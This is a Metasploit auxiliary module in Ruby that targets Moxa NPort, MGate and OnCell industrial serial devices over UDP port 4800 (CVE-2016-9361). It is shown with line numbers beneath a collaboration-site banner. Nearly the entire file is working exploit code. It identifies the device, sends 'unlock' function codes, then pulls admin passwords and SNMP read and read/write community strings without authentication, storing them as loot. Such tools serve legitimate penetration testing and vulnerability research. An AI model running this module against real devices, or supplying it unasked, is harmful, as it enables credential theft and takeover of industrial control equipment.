Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Udp
8
  include Msf::Auxiliary::Report
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'Moxa Device Credential Retrieval',
13
      'Description'    => %q{
14
        The Moxa protocol listens on 4800/UDP and will respond to broadcast
15
        or direct traffic.  The service is known to be used on Moxa devices
16
        in the NPort, OnCell, and MGate product lines.  Many devices with
17
        firmware versions older than 2017 or late 2016 allow admin credentials
18
        and SNMP read and read/write community strings to be retrieved without
19
        authentication.
20

21
        This module is the work of Patrick DeSantis of Cisco Talos and K. Reid
22
        Wightman.
23

24
        Tested on: Moxa NPort 6250 firmware v1.13, MGate MB3170 firmware 2.5,
25
        and NPort 5110 firmware 2.6.
26

27
      },
28
      'Author'         =>
29
        [
30
          'Patrick DeSantis <p[at]t-r10t.com>',
31
          'K. Reid Wightman <reid[at]revics-security.com>'
32
        ],
33

34
      'License'        => MSF_LICENSE,
35
      'References'     =>
36
        [
37
          [ 'CVE', '2016-9361'],
38
          [ 'BID', '85965'],
39
          [ 'URL', 'https://www.digitalbond.com/blog/2016/10/25/serial-killers/'],
40
          [ 'URL', 'https://github.com/reidmefirst/MoxaPass/blob/master/moxa_getpass.py' ],
41
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-336-02']
42
        ],
43
      'DisclosureDate' => '2015-07-28'))
44

45
    register_options([
46
      # Moxa protocol listens on 4800/UDP by default
47
      Opt::RPORT(4800),
48
      OptEnum.new("FUNCTION", [true, "Pull credentials or enumerate all function codes", "CREDS",
49
        [
50
          "CREDS",
51
          "ENUM"
52
        ]])
53
      ])
54
  end
55

56
  def fc() {
57
    # Function codes
58
    'ident'         =>  "\x01",   # identify device
59
    'name'          =>  "\x10",   # get the "server name" of the device
60
    'netstat'       =>  "\x14",   # network activity of the device
61
    'unlock1'       =>  "\x16",   # "unlock" some devices, including 5110, MGate
62
    'date_time'     =>  "\x1a",   # get the device date and time
63
    'time_server'   =>  "\x1b",   # get the time server of device
64
    'unlock2'       =>  "\x1e",   # "unlock" 6xxx series devices
65
    'snmp_read'     =>  "\x28",   # snmp community strings
66
    'pass'          =>  "\x29",   # admin password of some devices
67
    'all_creds'     =>  "\x2c",   # snmp comm strings and admin password of 6xxx
68
    'enum'          =>  "enum"    # mock fc to catch "ENUM" option
69
  }
70
  end
71

72
  def send_datagram(func, tail)
73
    if fc[func] == "\x01"
74
      # identify datagrams have a length of 8 bytes and no tail
75
      datagram = fc[func] + "\x00\x00\x08\x00\x00\x00\x00"
76
      begin
77
        udp_sock.put(datagram)
78
        response = udp_sock.get(3)
79
      rescue ::Timeout::Error
80
      end
81
      format_output(response)
82
      # the last 16 bytes of the ident response are used as a form of auth for
83
      # function codes other than 0x01
84
      tail = response[8..24]
85
    elsif fc[func] == "enum"
86
      for i in ("\x02".."\x80") do
87
        # start at 2 since 0 is invalid and 1 is ident
88
        datagram = i + "\x00\x00\x14\x00\x00\x00\x00" + tail
89
        begin
90
          udp_sock.put(datagram)
91
          response = udp_sock.get(3)
92
        end
93
        if response[1] != "\x04"
94
          vprint_status("Function Code: #{Rex::Text.to_hex_dump(datagram[0])}")
95
          format_output(response)
96
        end
97
      end
98
    else
99
      # all non-ident datagrams have a len of 14 bytes and include a tail that
100
      # is comprised of bytes obtained during the ident
101
      datagram = fc[func] + "\x00\x00\x14\x00\x00\x00\x00" + tail
102
      begin
103
        udp_sock.put(datagram)
104
        response = udp_sock.get(3)
105
        if valid_resp(fc[func], response) == -1
106
          # invalid response, so don't bother trying to parse it
107
          return
108
        end
109
        if fc[func] == "\x2c"
110
          # try this, note it may fail
111
          get_creds(response)
112
        end
113
        if fc[func] == "\x29"
114
        # try this, note it may fail
115
        get_pass(response)
116
        end
117
        if fc[func] == "\x28"
118
        # try this, note it may fail
119
        get_snmp_read(response)
120
        end
121
      rescue ::Timeout::Error
122
      end
123
      format_output(response)
124
    end
125
  end
126

127
  # helper function for extracting strings from payload
128
  def get_string(data)
129
    str_end = data.index("\x00")
130
    return data[0..str_end]
131
  end
132

133
  # helper function for extracting password from 0x29 FC response
134
  def get_pass(response)
135
    if response.length() < 200
136
      print_error("get_pass failed: response not long enough")
137
      return
138
    end
139
    pass = get_string(response[200..-1])
140
    print_good("password retrieved: #{pass}")
141
    store_loot("moxa.get_pass.admin_pass", "text/plain", rhost, pass)
142
    return pass
143
  end
144

145
  # helper function for extracting snmp community from 0x28 FC response
146
  def get_snmp_read(response)
147
    if response.length() < 24
148
      print_error("get_snmp_read failed: response not long enough")
149
      return
150
    end
151
    snmp_string = get_string(response[24..-1])
152
    print_good("snmp community retrieved: #{snmp_string}")
153
    store_loot("moxa.get_pass.snmp_read", "text/plain", rhost, snmp_string)
154
  end
155

156
  # helper function for extracting snmp community from 0x2C FC response
157
  def get_snmp_write(response)
158
    if response.length() < 64
159
      print_error("get_snmp_write failed: response not long enough")
160
      return
161
    end
162
    snmp_string = get_string(response[64..-1])
163
    print_good("snmp read/write community retrieved: #{snmp_string}")
164
    store_loot("moxa.get_pass.snmp_write", "text/plain", rhost, snmp_string)
165
  end
166

167
  # helper function for extracting snmp and pass from 0x2C FC response
168
  # Note that 0x2C response is basically 0x28 and 0x29 mashed together
169
  def get_creds(response)
170
    if response.length() < 200
171
      # attempt failed. device may not be unlocked
172
      print_error("get_creds failed: response not long enough. Will fall back to other functions")
173
      return -1
174
    end
175
    get_snmp_read(response)
176
    get_snmp_write(response)
177
    get_pass(response)
178
  end
179

180
  # helper function to verify that the response was actually for our request
181
  # Simply makes sure the response function code has most significant bit
182
  # of the request number set
183
  # returns 0 if everything is ok
184
  # returns -1 if functions don't match
185
  def valid_resp(func, resp)
186
    # get the query function code to an integer
187
    qfc = func.unpack("C")[0]
188
    # make the response function code an integer
189
    rfc = resp[0].unpack("C")[0]
190
    if rfc == (qfc + 0x80)
191
      return 0
192
    else
193
      return -1
194
    end
195
  end
196

197
  def format_output(resp)
198
    # output response bytes as hexdump
199
    vprint_status("Response:\n#{Rex::Text.to_hex_dump(resp)}")
200
  end
201
  def check
202
    connect_udp
203

204
    begin
205
      # send the identify command
206
      udp_sock.put("\x01\x00\x00\x08\x00\x00\x00\x00")
207
      response = udp_sock.get(3)
208
    end
209

210
    if response
211
      # A valid response is 24 bytes, starts with 0x81, and contains the values
212
      # 0x00, 0x90, 0xe8 (the Moxa OIU) in bytes 14, 15, and 16.
213
      if response[0] == "\x81" && response[14..16] == "\x00\x90\xe8" && response.length == 24
214
        format_output(response)
215
        return Exploit::CheckCode::Appears
216
      end
217
    else
218
      vprint_error("Unknown response")
219
      return Exploit::CheckCode::Unknown
220
    end
221
    cleanup
222

223
    Exploit::CheckCode::Safe
224
  end
225

226
  def run
227
    unless check == Exploit::CheckCode::Appears
228
      print_error("Aborted because the target does not seem vulnerable.")
229
      return
230
    end
231

232
    function = datastore["FUNCTION"]
233

234
    connect_udp
235

236
    # identify the device and get bytes for the "tail"
237
    tail = send_datagram('ident', nil)
238

239
    # get the "server name" from the device
240
    send_datagram('name', tail)
241

242
    # "unlock" the device
243
    # We send both versions of the unlock FC, this doesn't seem
244
    # to hurt anything on any devices tested
245
    send_datagram('unlock1', tail)
246
    send_datagram('unlock2', tail)
247

248
    if function == "CREDS"
249
      # grab data
250
      send_datagram('all_creds', tail)
251
      send_datagram('snmp_read', tail)
252
      send_datagram('pass', tail)
253
    elsif function == "ENUM"
254
      send_datagram('enum', tail)
255
    else
256
      print_error("Invalid FUNCTION")
257
    end
258

259
    disconnect_udp
260
  end
261
end
262

263